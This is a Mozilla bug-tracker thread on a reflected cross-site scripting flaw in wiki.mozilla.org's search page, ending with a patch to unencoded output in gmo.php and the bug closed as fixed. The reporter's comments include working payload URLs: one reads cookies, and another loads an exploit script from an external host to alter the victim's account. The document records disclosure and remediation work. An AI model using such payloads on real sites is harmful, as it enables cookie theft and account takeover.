User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Steps to reproduce: Hello, I found a vulnerability Cross Site Scripting in https://wiki.mozilla.org. The vulnerability results because the research is not correct encoding, thus allowing an attacker to attack Cross Site Scripting, and possibly pledging the account of the victim to visit a specially crafted link. Exploration for the attacker must convince the User logged in to visit the page with a link specially created exploiting this flaw and stealing the victim's cookies. Reproduce: 1. Log in https://wiki.mozilla.org. 2. Now, go to https://wiki.mozilla.org/Special:Search?search=sssssssssssssss%22%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&x=23&y=8 3. See your cookies. this vulnerability may be eligible for a reward? Regards, Mario
Thank you for reporting this issue to us. We'll investigate the issue and provide feedback within the bug. No additional action is needed from you at this time. If you have questions or additional information please add that info to the bug. Thanks, mgoodwin
Status: UNCONFIRMED → NEW
Ever confirmed: true
Only, for confirm a possible attack. I'm attaching a exploit for this vulnerability, he exploit the vulnerability and change user informations doing a CSRF attack. Reproduce: 1. Log in wiki.mozilla.org 2. Open this https://wiki.mozilla.org/Special:Search?search=%22%3E%3Cscript%20src=http://fuzzgooglecode.googlecode.com/files/xssexploit%282%29.js%3E%3C/script%3E 3. Wait... 4. See your account, changed.
I wonder if this vulnerability may be eligible for a reward?
It seems that Mozilla is ignoring this flaw, it's been two weeks, no correction, no response. No reason for this failure to keep private. Mozilla is forcing me to make this flaw public. You will not fix this flaw?
It seems the issue here is with the gmo skin. The offending line is 353 of gmo.php: echo " » <a href=\"$item_url\"> Search: " . $search_params['search'] . "</a>"; Any user supplied input should be correctly output encoded prior to being written. See https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines#Preventing_XSS for more info.
Assignee: nobody → milos
(In reply to Mario Gomes from comment #5) > I wonder if this vulnerability may be eligible for a reward? Mario, this particular site is not on the bounty list and is not eligible for the bounty program. The list of sites that do qualify can be found here : http://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs However, we do still appreciate you filing this issue and we'll work to address it.
In the post about bug bounty, Mozilla also said that will also pay for security bugs in websites not listed. But, seems the bug need be "ws:critical". This is right?
in the post, Mozilla also said that will pay also for reports in not listed. But, seems only pay for bugs "ws:critical"?
(In reply to Mario Gomes from comment #11) > in the post, Mozilla also said that will pay also for reports in not listed. > But, seems only pay for bugs "ws:critical"? Correct, we sometimes pay bounties for exceptional security issues in other sites that were not listed within the bounty scope. WS:critical would be a minimum requirement, but would not guarantee a bounty payment. We would need to evaluate the specific issue on a case by case basis.
Okay. I will try find it. Only a doubt, why Mozilla here https://wiki.mozilla.org/WebAppSec/Web_App_Severity_Ratings put CSRF more critical than XSS(reflected), if with a XSS I can do CSRF attacks(see comment 3). For exemple: the bug 620397. The CSRF can change the user informations, but if i have a XSS Reflected I can do this easy(bypassing the security tokens).
This should fix the issue. Sadly, I don't have an instance of Mediawiki handy, so can someone try this out please?
Comment on attachment 591185 [details] [diff] [review] Possible patch Review of attachment 591185 [details] [diff] [review]: ----------------------------------------------------------------- Looks good, thanks Fred. Jake: please push this to prod, thanks.
Attachment #591185 - Flags: review?(milos) → review+
Landed: r100350. Will file a bug to get this pushed.
Assignee: milos → fwenzel
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
You need to log in before you can comment on or make changes to this bug.